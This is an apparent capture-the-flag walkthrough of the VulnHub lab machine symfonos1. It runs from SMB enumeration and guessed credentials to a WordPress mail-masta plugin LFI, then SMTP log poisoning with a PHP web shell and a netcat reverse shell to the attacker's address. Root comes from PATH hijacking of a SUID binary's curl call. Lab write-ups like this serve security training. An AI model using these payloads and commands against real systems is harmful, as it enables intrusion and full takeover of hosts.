symfonos1

Enumerating the smb Which has Anonymous access , there user zeus kept attension.txt about poor passwd usage , using that creds , you can brutefore the helios accout [exposed using anonymous smb access] , In helios SMB , he Posted todo.txt where he menctioned /h3l105 directory which is a wodress Directory , vuln pluging in wordpress has lfi , using this lfi RCE is made with smtpLog log Poisoning , from there suid is not using curl absloute path , by Hijacking the path , lead us to Root access

Nmap

22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:AC:F4:0D (Oracle VirtualBox virtual NIC)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m52s, deviation: 2h53m12s, median: -7s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS/x00
|   Domain name: /x00
|   FQDN: symfonos
|_  System time: 2021-04-16T01:44:40-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-16T06:44:40
|_  start_date: N/A

Enumeration

Smb Enumeration

smbclient -U”anonymous%anonymous” //10.0.2.49/anonymous

you can find the attension.txt inside anonymous directory

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

┌──(root💀nucleus)-[~/vulnhub/symfonos1]
└─# smbclient -U"helios%qwerty" //10.0.2.49/helios         
Try "help" to get a list of possible commands.
smb: /> ls
  .                                   D        0  Fri Jun 28 20:32:05 2019
  ..                                  D        0  Fri Jun 28 20:37:04 2019
  research.txt                        A      432  Fri Jun 28 20:32:05 2019
  todo.txt                            A       52  Fri Jun 28 20:32:05 2019

                19994224 blocks of size 1024. 17303416 blocks available
smb: /> get research.txt 
getting file /research.txt of size 432 as research.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: /> get todo.txt 
getting file /todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: /> 

Research.txt
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
Todo.txt
  1. Binge watch Dexter
  2. Dance
  3. Work on /h3l105

/h3l105 is wordPress website , you can use wpscanm to Enumerate the Website

Using wp-scan you can Enumerate the wordpress

┌──(root💀nucleus)-[~/vulnhub/symfonos1]
└─# wpscan --url http://symfonos.local/h3l105 -e p  
_______________________________________________________________
         __          _______   _____
         / /        / /  __ / / ____|
          / /  //  / /| |__) | (___   ___  __ _ _ __ ®
           / //  // / |  ___/ /___ / / __|/ _ | _ /
            /  //  /  | |     ____) | (__| (_| | | | |
             //  //   |_|    |_____/ /___|/__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.15
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://symfonos.local/h3l105/ [10.0.2.49]
[+] Started: Fri Apr 16 04:12:47 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://symfonos.local/h3l105/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://symfonos.local/h3l105/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://symfonos.local/h3l105/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://symfonos.local/h3l105/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://symfonos.local/h3l105/index.php/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
 |  - http://symfonos.local/h3l105/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/
 | Last Updated: 2021-03-09T00:00:00.000Z
 | Readme: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.0
 | Style URL: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Apr 16 04:12:49 2021
[+] Requests Done: 2
[+] Cached Requests: 38
[+] Data Sent: 634 B
[+] Data Received: 1.097 KB
[+] Memory used: 198.547 MB
[+] Elapsed time: 00:00:02

Exploitation

Server is Runing the mail-masta Searchploit Revels , that it has LFI

LFI

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

LFI TO RCE
smpt log file poisoinig
┌──(root💀nucleus)-[~]
└─# telnet 10.0.2.49 25                                                        
Trying 10.0.2.49...
Connected to 10.0.2.49.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM:<Nucleus>
250 2.1.0 Ok
RCPT TO:Helios
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 44C6E40846

php shell code injection into smtp mail log file

<?php system($_GET[‘cmd’]); ?>

Press . to complete mail

/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc -e /bin/sh 10.0.2.36 3333

Privilage esclation

strings statuscheck                                                                                                             
/lib64/ld-linux-x86-64.so.2                                                                                                     
libc.so.6                                                                                                                       
system                                                                                                                          
__cxa_finalize                                                                                                                  
__libc_start_main                                                                                                               
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
***curl -I H***
statusCheck
Here statuscheck suid exectable is not using absloute path , we can hijack the curl path with malicious Curl

PathHijacking

create a curl and pipe the bin/bash using echo give permission to execute

cd /tmp
echo "/bin/sh" > curl
chmod +x curl
export PATH=/tmp:$PATH
/opt/statuscheck
id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
cd /root
ls
proof.txt
cat proof.txt

        Congrats on rooting symfonos:1!

                 / __
--==/////////////[})))==*
                 / / '          ,|
                    `/`/      //|                             ,|
                      / `/  //,/'                           -~ |
   )             _-~~~/  |/ / |'|                       _-~  / ,
  ((            /' )   | / / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~/   `///'/|'           __--~~__--/ _-~  _/, 
((( ))            / ~~    / /~      __--~~  --~~  __/~  _-~ /
 ((/~/           |    )   | '      /        __--~~  /-~~ _-~
    `/(/    __--(   _/    |'/     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        /~/   /     ___---~~  ~~/~~__--~ 
      ~~/~~~~~~   `/-~      /~/ /           __--~~~'~~/
                   ;/ __.-~  ~-/      ~~~~~__/__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~/     
                  ;;;;;;;'   /      ----~~/         `/,~    `/ /        
                  ;;;;'     (      ---~~/         `:::|       `//.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______///~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;//    /                ((   ( 
        //  / /                        /  |  /;;,/                 `   
       (<_    / /                    /',/-----'  _> 
        /_|     //_                 //~;~~~~~~~~~ 
                 /_|               (,~~   
                                    /~/
                                     ~~

        Contact me via Twitter @zayotic to give feedback!